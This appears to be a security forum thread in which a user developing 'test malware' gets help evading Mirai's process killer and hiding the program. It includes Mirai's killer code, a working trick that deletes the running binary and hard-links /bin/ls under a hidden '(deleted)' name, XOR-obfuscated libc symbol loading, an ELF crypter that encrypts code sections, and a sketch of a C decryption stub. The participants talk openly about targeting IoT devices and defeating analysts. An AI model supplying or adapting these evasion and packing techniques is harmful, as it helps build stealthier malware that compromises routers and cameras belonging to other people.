Malware Killed for " (deleted)" binary

My test malware gets killed by another malware because it deletes its own binary. Is there a way to bypass this,
or am I forced to keep the binary on the system?

This is the part of the code that kills my test malware. It is taken from the Mirai source code on GitHub.

(Both were launched in a virtual machine.)

complete code: https://github.com/jgamblin/Mirai-Source-Code/blob/master/mirai/bot/killer.c

            // Store /proc/$pid/exe into exe_path
            snprintf(exe_path, sizeof(exe_path), "/proc/%s/exe", file->d_name);


            // Resolve exe_path (/proc/$pid/exe) -> realpath
            if ((rp_len = readlink(exe_path, realpath, sizeof (realpath) - 1)) != -1)
            {
                realpath[rp_len] = 0; // Nullterminate realpath, since readlink doesn't guarantee a null terminated string

                // Skip this file if its realpath == killer_realpath
                if (pid == getpid() || pid == getppid() || util_strcmp(realpath, killer_realpath))
                    continue;

               // if the binary was deleted
                if ((fd = open(realpath, O_RDONLY)) == -1)
                {
#ifdef DEBUG
                    printf("[killer] Process '%s' has deleted binary!\n", realpath);
#endif
                    kill(pid, 9);
                }
                close(fd);
            }

What are you asking? If you’re running a binary on a system the file should be locked because it’s mapped to memory and actively being used. The code you just showed just kills a process that’s running in memory immediately.

If you do more research or just read more of the source code, you will see that there’s a target range that gets killed. In the linux source code there’s a defined minimum PID for reserved system process and a max PID range for everything else. I’d suggest you do more reading to understand that.


The code checks whether the binary file associated with each process exists. If it doesn’t, it kills the process, probably because it considers it a rival malware that deleted its binary. I just wanted to know if there is a way to delete my malware binary (unlink) from the system without triggering that code.
(From what I understand, I don’t think it’s possible: even if I start my malware directly in memory, the killer will still scan /proc/pid/exe, try to open the target, fail, and kill the process anyway.)
The alternative would be to hide the process in /proc, but that would necessarily require root.


A very simple but not so elegant way to solve the issue could be this:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main (int argc, char *argv[]) {
  char name[1024];
  char realpath[1024];
  int  rp_len;
  int  fd;

  printf ("This is process (%d)\n", getpid());
  unlink (argv[0]);
  sprintf (name, "%s (deleted)", argv[0]);
  if ((link ("/bin/ls", name)) < 0) perror ("link:");

  // This is the code on the Original Post to check if it works
  sprintf (name, "/proc/%d/exe", getpid ());
  memset (realpath, 0,1024);
  if ((rp_len = readlink (name, realpath, 1023)) < 0) exit (1);
  printf ("'%s' -> '%s'\n", name , realpath);
  if ((fd = open(realpath, O_RDONLY)) == -1)
    {
      printf ("Killing process\n");
      close(fd);
    }
  getchar ();
  
}

In a nutshell, readlink will return the name of the file plus one space plus the string deleted (when the original binary is deleted). So we just create a file with that name. You basically wrote this solution in the title of your post :sweat_smile:.

I chose to create a link so I can create the file in just one syscall. Also, this way, we use a binary already existing in the system that is less suspicious and will pass any file scanning.

Note that your malware is effectively deleted and the file we create is a hard link to ls. A file named filename (deleted) is suspicious, so we can just add a . at the beginning to hide the file from a simple ls.

As I said it is not the most elegant way, but it is a way to get your code deleted from disk and pass the Mirai test. As Mirai was intended to run on IoT devices it is unlikely that somebody will be listing some random folder on an IP cam… but who knows.

Actually, I got an idea while writing this… but I first have to try it, and if it works it would make a nice post, so I’ll keep it to myself for the time being :wink:

Hope this helps


Oh… thank you so much, it was so simple but I couldn’t get there hahaha. It helped me a lot :innocent:.
I would like to know your opinion on another thing. I noticed that the original Mirai code uses all the standard libraries except <string.h>; the author implements the string functions he needs in util.c.
While rewriting my malware from scratch I had an idea: why not load only the functions we need directly from libc.so.6?
I’ll post a piece of code; tell me what you think (I hope it’s not useless and ugly).

syscall.h

struct fn_table {
    void *libc_handle;

    int (*open)(const char *, int, ...);
    int (*close)(int);

    int (*strcmp)(const char *, const char *);
    int (*snprintf)(char *, size_t, const char *, ...);
    char *(*strstr)(const char *, const char *);

    void (*memset)(void *, int, size_t);
    void *(*malloc)(size_t size);
    void *(*calloc)(size_t nmemb, size_t size);
    void *(*realloc)(void* ptr, size_t size);
    void (*free)(void* ptr);
    void (*exit)(int status);

    int (*unlink)(const char *);
    int (*fork)(void);
    unsigned int (*sleep)(unsigned int);
    int (*kill)(pid_t, int);
    ssize_t (*readlink)(const char *, char *, size_t);
    pid_t (*getpid)(void);
    pid_t (*getppid)(void);
    ssize_t (*read)(int, void *, size_t);
    size_t (*strlen)(const char *);
    char *(*strncpy)(char *, const char *, size_t);
    int (*fcntl)(int, int, ...);
    char *(*strchr)(const char *, int);
    int (*atoi)(const char *);
};

extern struct fn_table fn; 

syscall.c

void load_syscall(void)
{
    char *libc = "libc.so.6";
    fn.libc_handle = dlopen(libc, RTLD_LAZY);

    char *malloc = "malloc";
    fn.malloc = dlsym(fn.libc_handle, malloc);

    char *free = obfd("\x56\x42\x55\x55\x30", 5);
    fn.free = dlsym(fn.libc_handle, free);
    fn.free(free);

    char *open = obfd("\x5F\x40\x55\x5E\x30", 5);
    fn.open = dlsym(fn.libc_handle, open);
    fn.free(open);

    char *close = obfd("\x53\x5C\x5F\x43\x55\x30", 6);
    fn.close = dlsym(fn.libc_handle, close);
    fn.free(close);
    
    char *strcmp = obfd("\x43\x44\x42\x53\x5D\x40\x30", 7);
    fn.strcmp = dlsym(fn.libc_handle, strcmp);
    fn.free(strcmp);

    char *snprintf = obfd("\x43\x5E\x40\x42\x59\x5E\x44\x56\x30", 9);
    fn.snprintf = dlsym(fn.libc_handle, snprintf);
    fn.free(snprintf);

    char *strstr = obfd("\x43\x44\x42\x43\x44\x42\x30", 7);
    fn.strstr = dlsym(fn.libc_handle, strstr);
    fn.free(strstr);
    
    char *memset = obfd("\x5D\x55\x5D\x43\x55\x44\x30", 7);
    fn.memset = dlsym(fn.libc_handle, memset);
    fn.free(memset);

    char *calloc = obfd("\x53\x51\x5C\x5C\x5F\x53\x30", 7);
    fn.calloc = dlsym(fn.libc_handle, calloc);
    fn.free(calloc);

    char *realloc = obfd("\x42\x55\x51\x5C\x5C\x5F\x53\x30", 8);
    fn.realloc = dlsym(fn.libc_handle, realloc);
    fn.free(realloc);

    char *exit = obfd("\x55\x48\x59\x44\x30", 5);
    fn.exit = dlsym(fn.libc_handle, exit);
    fn.free(exit);
    
    char *unlink = obfd("\x45\x5E\x5C\x59\x5E\x5B\x30", 7);
    fn.unlink = dlsym(fn.libc_handle, unlink);
    fn.free(unlink);

    char *fork = obfd("\x56\x5F\x42\x5B\x30", 5);
	fn.fork = dlsym(fn.libc_handle, fork);
    fn.free(fork);

    char *sleep = obfd("\x43\x5C\x55\x55\x40\x30", 6);
	fn.sleep = dlsym(fn.libc_handle, sleep);
    fn.free(sleep);

    char *kill = obfd("\x5B\x59\x5C\x5C\x30", 5);
	fn.kill = dlsym(fn.libc_handle, kill);
    fn.free(kill);

    char *readlink = obfd("\x42\x55\x51\x54\x5C\x59\x5E\x5B\x30", 9);
	fn.readlink = dlsym(fn.libc_handle, readlink);
    fn.free(readlink);

    char *getpid = obfd("\x57\x55\x44\x40\x59\x54\x30", 7);
	fn.getpid = dlsym(fn.libc_handle, getpid);
    fn.free(getpid);

    char *getppid = obfd("\x57\x55\x44\x40\x40\x59\x54\x30", 8);
	fn.getppid = dlsym(fn.libc_handle, getppid);
    fn.free(getppid);

    char *read = obfd("\x42\x55\x51\x54\x30", 5);
	fn.read = dlsym(fn.libc_handle, read);
    fn.free(read);

    char *strlen = obfd("\x43\x44\x42\x5C\x55\x5E\x30", 7);
    fn.strlen = dlsym(fn.libc_handle, strlen);
    fn.free(strlen);

    char *strncpy = obfd("\x43\x44\x42\x5E\x53\x40\x49\x30", 8);
    fn.strncpy = dlsym(fn.libc_handle, strncpy);
    fn.free(strncpy);

    char *fcntl = obfd("\x56\x53\x5E\x44\x5C\x30", 6);
    fn.fcntl = dlsym(fn.libc_handle, fcntl);
    fn.free(fcntl);

    char *strchr = obfd("\x43\x44\x42\x53\x58\x42\x30", 7);
    *(void **)(&fn.strchr) = dlsym(fn.libc_handle, strchr);
    fn.free(strchr);

    char *atoi = obfd("\x51\x44\x5F\x59\x30", 5);
    fn.atoi = (int (*)(const char *))dlsym(fn.libc_handle, atoi);
    fn.free(atoi);
}

Hi @darad

Not sure why Mirai only implements the string functions; I haven’t really gone through all the code in detail.

I believe that whenever you dlopen a library, the whole library is loaded in memory. So even if you resolve just a few symbols, the code of all of them will be in memory. Just try with a small library and check /proc/PID/maps to see the memory assigned before and after loading the library. The main advantage of using dlsym is to hide from the analyst the functions you use from a library, or to swap them dynamically… there may be other use cases, but I cannot think of any right now (it is common on Windows tho).
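The before/after comparison suggested above could be sketched roughly like this. It is only an illustration, not something from the thread: `count_mappings` is a hypothetical helper name, and it simply counts the lines of /proc/self/maps that mention a given string (Linux only).

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: count the lines of /proc/self/maps that contain
 * `needle`. Returns -1 if the maps file cannot be opened. */
int count_mappings(const char *needle)
{
    assert(needle != NULL);

    FILE *f = fopen("/proc/self/maps", "r");
    if (f == NULL)
        return -1;

    char line[4096];
    int count = 0;
    while (fgets(line, sizeof(line), f) != NULL)
        if (strstr(line, needle) != NULL)
            count++;

    fclose(f);
    return count;
}
```

Calling it once before and once after a dlopen of some small library (with part of that library's file name as `needle`) gives two numbers to compare; resolving more symbols with dlsym afterwards and calling it again shows whether the mappings change.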

Furthermore, getting your program to run without libc is tricky because libc does not just provide the regular functions you use in your programs; it also contains all the initialisation code that is needed in order to run main… that is the infamous crt0.o, crtS.o, et al. This code sets up the stack, runs constructors and makes sure destructors will be executed before terminating the program (well, not all crt files implement the constructor/destructor thingy). BTW, crt stands for C Run-Time.
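To make the constructor/destructor part concrete, here is a minimal sketch, assuming GCC or Clang (the attributes are compiler extensions, not standard C). All names are made up for the illustration.

```c
#include <assert.h>
#include <stdio.h>

static int constructor_calls = 0;

/* GCC/Clang extension: the start-up code runs this before main(). */
__attribute__((constructor))
static void before_main(void)
{
    constructor_calls++;
}

/* GCC/Clang extension: run after main() returns or exit() is called. */
__attribute__((destructor))
static void after_main(void)
{
    /* By the time any destructor runs, the constructor has run exactly once. */
    assert(constructor_calls == 1);
    fputs("destructor ran after main\n", stderr);
}

/* Lets main() (or any other code) observe that the constructor already ran. */
int constructors_run_so_far(void)
{
    return constructor_calls;
}
```

Nothing in the program calls `before_main` or `after_main` explicitly; if `constructors_run_so_far()` returns 1 at the top of main, it is because the run-time start-up code did that work first.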

This post may give you a bit of insights on what this involves (however it doesn’t dive on crt implementation, but there are very good tutorials out there if you are interested):


Thank you for the answer. I will check the post right away. For now the functions are working correctly, both in main and in the other .c files. I will check /proc/pid/maps to compare the memory allocated before and after loading the library.
My intent was to hide the functions and get a smaller binary by loading only the necessary functions.


hi @0x00pf

this is the /proc/pid/maps of the malware

Unless you have done something special, your program is already linked to libc. In other words, it doesn’t matter if you dlopen the library, because it is already there. Try commenting out the code that dlopens the library and you will still see the same mapping.

For example, this code works:

#include <dlfcn.h>

int main () {
  void *h = dlopen (0x0, RTLD_LAZY);
  
  void (*my_puts)(char *) = dlsym (h, "puts");
  my_puts ("Hello World");
}

If you compile and run it…

$ gcc -o test1 test1.c -ldl
$ ./test1
Hello World

because libc is already mapped (you do not need to open it, it is already there).
Summing up:

  • You do not need to dlopen libC unless you have compiled your program specially to not include it. Even then, it is likely that some things won’t work unless you make sure that all the initialisation performed by the library is done by your program… and then you end up doing the same thing that libC does
  • Doesn’t matter if you dlopen libc or just linked it dynamically. Your binary will be the same size (that’s the main goal of dynamic libraries) and the memory footprint will also be the same as, in both cases, libC gets loaded in memory anyhow
  • AFAIK dlsym resolves symbols, doesn’t extract pieces of code of a library. Just take some non-trivial library out there, and start importing function and check if the mapping of that library changes (grows). Honestly I do not know if that is the case, but I believe the whole thing is loaded at once (when memory pages get actually filled in is something else).

To hide the function names you can just strip your binary and remove any symbols. People can still reverse engineer your program… people can always reverse engineer your program. dlsyming obfuscated functions is actually worse, because you can reverse the obfuscated function name and get the names of the functions… However, I’m curious about the rationale for hiding standard libC functions…

To make your binary smaller you are better off with a libC targeting embedded systems, like musl or uClibc. You can customise what you want in the library (at least for uClibc) and also, as far as I remember, you can compile it as a static library. With a static library, the code you don’t use is not included at the linking stage… at the level of the object files packed together in the library (not at function level).


Thank you, this is all much clearer now; I wasn’t aware of what you just explained.
I will modify the code to use musl or uClibc, because from what I understand dlsym and dlopen are not very useful (at least in this case).
I’ll take a look at the strip options too.
I was also thinking of making the code metamorphic/polymorphic, but I think it’s a bit complicated: if I have to compile the malware for various architectures, I have to use the assembly of each specific architecture, such as ARM, MIPS etc…


It all depends on what you want to do. I do not think it is useful to use dlXXX with libC, but there may be cases where that is the way forward. There is no magic solution for all cases. You need to think about what you want to achieve and find the best solution.

For example, using uClibc statically will make your program bigger because all the code you use from libc.so is now included in your binary. On the other hand, your program will work on any system, regardless of the libC version installed on it. As I said, it depends on what you want. If you are targeting routers… many of those run busybox using uClibc… no libc.so in the filesystem… so you will have to transfer the library together with your program to make it work. So you are not saving any space in the size of your program… actually the other way around.

The easy way to make your code polymorphic is using a crypter. Overall, you want your crypter stub to be small, as that is the part that doesn’t change, and that is why it is often implemented in asm (among other reasons), but you can implement the stub in C if you want. Take a look at this series on crypters from some time ago. Still valid tho, as far as I reckon. The stub is coded in asm in those posts, but they describe what you have to do, so you can just implement it using C:


perfect, thank you very much, these posts are very interesting and will definitely help me.

Hi, I’m following the post on the ELF crypter. Everything works except the encryption function: I tried xor and aes, and with both it doesn’t work (when I try to run the binary it prints a seg fault), while with your rc4 algorithm it works. I don’t understand why; this is my code.
I’m still stuck on the first post (Programming for Wanabes XIII. Crypters part I) because I’m trying to modify your crypter and add something, and also to understand how the ELF headers work.
I’m pretty sure there’s something wrong with the encryption stage.

static uint32_t table_key = 0xcafebabe;

int main (int argc, char *argv[])
{
	if (argc != 2) 
	{
    		fprintf (stderr, "Invalid number of parameters\n");
    		fprintf (stderr, "Usage: crypter <binary>\n");
    		exit(-1);
  	}

	int fd = -1;
	if((fd = open(argv[1], O_RDWR)) == -1)
		exit(-1);

	struct stat _st;
	if((fstat (fd, &_st)) == -1)
		exit(-1);

	unsigned char *p;
	if ((p = mmap (0, _st.st_size, PROT_READ | PROT_WRITE,
		 MAP_SHARED, fd, 0)) == MAP_FAILED)
	{
		fprintf (stderr, "Error mapping the binary\n");
		exit(-1);
	}

	Elf64_Ehdr *elf_header = (Elf64_Ehdr*)p;
	printf("Magic Bytes: %02x %c %c %c\n", elf_header->e_ident[0], elf_header->e_ident[1], elf_header->e_ident[2], elf_header->e_ident[3]);
	if (memcmp(elf_header->e_ident, ELFMAG, SELFMAG) != 0)
	{
    	fprintf(stderr, "Invalid file format\n");
    	fprintf(stderr, "Elf Required!\n");
    	munmap(p, _st.st_size);
    	close(fd);
    	exit(-1);
	}

	if(elf_header->e_type != ET_DYN)
	{
		fprintf (stderr, "File is not an executable\n");
		munmap(p, _st.st_size);
    	close(fd);
    	exit(-1);
	}


	printf ("Section Table located at : %ld\n", elf_header->e_shoff);
	printf ("Section Table entry size : %hu\n", elf_header->e_shentsize);
	printf ("Section Table entries    : %hu\n", elf_header->e_shnum);

	Elf64_Shdr *sh = (Elf64_Shdr*)(p + elf_header->e_shoff);
	unsigned char *s_name   = p + sh[elf_header->e_shstrndx].sh_offset;
	unsigned char *name = NULL;
	//char *key ="0x00Sec!\0";
	for (size_t i = 0; i < elf_header->e_shnum; i++)
	{
		name = s_name + sh[i].sh_name;
 		if (!strcmp((const char *)name, ".text") || !strcmp ((const char *)name, ".rodata"))
 		{
 			printf ("Section %02zu [%s]: Type: %d Flags: %lx Off: %lx Size: %lx => ",i, name,sh[i].sh_type, sh[i].sh_flags,sh[i].sh_offset, sh[i].sh_size);
	  		if (sh[i].sh_offset + sh[i].sh_size > _st.st_size)
	  		{
            	fprintf(stderr, "Error: Attempting to XOR beyond the end of the file.\n");
            	munmap(p, _st.st_size);
            	close(fd);
            	exit(-1);
        	}

	  		//rc4(p + sh[i].sh_offset, sh[i].sh_size, (unsigned char*)key, strlen (key));
	  		xor(p + sh[i].sh_offset, sh[i].sh_size);
      		puts(" - Crypted!");
  		}

 	}

	munmap(p, _st.st_size);
    close(fd);
	return 0;
}

static void xor(unsigned char *data, size_t data_len)
{
    uint8_t k1 = table_key & 0xff, k2 = (table_key >> 8) & 0xff, k3 = (table_key >> 16) & 0xff, k4 = (table_key >> 24) & 0xff;
    uint32_t cnt = 0;
    for (size_t i = 0; i < data_len; i++)
    {
        data[i] ^= k1;
        data[i] ^= k2;
        data[i] ^= k3;
        data[i] ^= k4;
        ++cnt;
    }
    printf(" [%d bytes encoded]", cnt);
}

The first instalment just tells you how to implement RC4 and how to crypt the .text and .rodata sections. The output you get from your program cannot be executed yet: it is missing the stub that is added in the next instalments. So it is normal that the program crashes. It usually does so with an illegal instruction exception tho. Using a xor encoder you can just run the crypter again to verify the code is restored. If it works with rc4 that means something is wrong.

Also note that the way you implement xor is strange. I’d expect something like this, for example:

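    const uint8_t k[4] = { k1, k2, k3, k4 };
    for (size_t i = 0; i < data_len; i++)
    {
        // Rotate through the four key bytes; indexing per byte also avoids
        // writing past the buffer when data_len is not a multiple of 4
        data[i] ^= k[i % 4];
        ++cnt;
    }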
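The "run it again to verify the data is restored" property of xor can be checked on a plain buffer, without touching any file. A minimal sketch; `xor_rolling` and `xor_round_trip_ok` are hypothetical names, and the key bytes are taken least significant byte first, like k1..k4 in the code above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* XOR `len` bytes in place with a repeating 4-byte key taken from `key32`
 * (least significant byte first). Applying it twice restores the input. */
void xor_rolling(unsigned char *data, size_t len, uint32_t key32)
{
    assert(data != NULL || len == 0);
    for (size_t i = 0; i < len; i++)
        data[i] ^= (unsigned char)(key32 >> (8 * (i % 4)));
}

/* Returns 1 if encoding and then decoding `len` bytes of `input` gives the
 * original bytes back, 0 otherwise (or if `len` exceeds the scratch buffer). */
int xor_round_trip_ok(const unsigned char *input, size_t len, uint32_t key32)
{
    unsigned char buf[256];
    if (len > sizeof(buf))
        return 0;
    memcpy(buf, input, len);
    xor_rolling(buf, len, key32);   /* encode */
    xor_rolling(buf, len, key32);   /* decode */
    return memcmp(buf, input, len) == 0;
}
```

Because the key index is computed per byte, the length does not have to be a multiple of four.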

OK, yes, I think it’s the length of the key. Trying rc4 with the key “0x00Sec!\0” works, in the sense that it prints “Illegal instructions”, while if I change the key to “0x00SecSoc!\0” it prints Segmentation Fault.
And if I run rc4 again, the binary works again. Well, I might try implementing rc6.

That’s a great question. I will just second 0x00pf. They seem to have laid out the best way to solve this.

Hi @0x00pf, if I write the stub in C, is the procedure to obtain the shellcode the same?
stub.c

#include <stdio.h>
#include <stdlib.h>

int main()
{
    printf("hello world\n");

    return 0;
}

That won’t work. It will dump the whole .text section, which for an executable contains much more than just main.

If you want to write the whole code in C, just call the stub from main. There are more elegant ways of doing that, but just calling it from main is the simplest and works. Your main problem is how to differentiate between your stub and the code you want to crypt/decrypt.

There are different solutions for that. The easiest is to put your code together and add a dummy function before main (and pray to the Void* Goddess that your code does not get re-ordered). Then you need to crypt between the first function and the dummy function… however, this is a crappy solution, as the compiler or the linker may reorganise your code and things will stop working… But you may give this a try as it is conceptually simpler. Then you can work out your solution from there. This will also help you to get fluent with the readelf and objdump tools.


int this_will_be_crypted () {....}
int this_will_also_be_crypted () {..}
(....)
int i_stop_crypting_here () {...}

int stub_written_in_C () {
  void *start = this_will_be_crypted;
  void *end = i_stop_crypting_here;
  size_t size = end - start;

 // Change memory permissions
// Crypt/Decrypt size bytes starting at start

}

int main () {
  stub_written_in_C ();
}

You should check that all the code you want to crypt is actually consecutive in memory and that the i_stop_crypting_here function is the last one. For a simple program it should work (for a single function it should work :slight_smile: ). Do not try to go for a full-fledged application. Use objdump for checking that. You can also try to add your own symbols (labels) at the end of each function so you know where they start and where they end. Then you need to crypt/decrypt each one separately.

Once you understand how this works… just look for a way to let the compiler or linker group all your code together. Take small steps, otherwise some concepts are just too difficult to grasp at first.

Hope this helps


Thank you for the reply. One idea (it’s not completely my own work; I looked at many examples around and found this one interesting: Introduction to Malware Obfuscation Using ELF Sections | Epitech-Lyon) is to create a new section that contains:

#define SECTION(x) __attribute__((section(x)))

SECTION(".stub") void stub(char *argv0)
{
     //code to map the elf
    .....
    //code to find sections
    ....
   decrypt(p + sh...);
}

int main(int argc, char **argv)
{
     stub(argv[0]);
}

and to call this function from main, the only part that has not been encrypted. I hope I understood correctly.


You found it quickly :slight_smile: … Maybe I gave too many hints :sweat_smile:

Now take a look at __attribute__ ((constructor)) to get a cleaner solution and you are done with the C part :wink: …
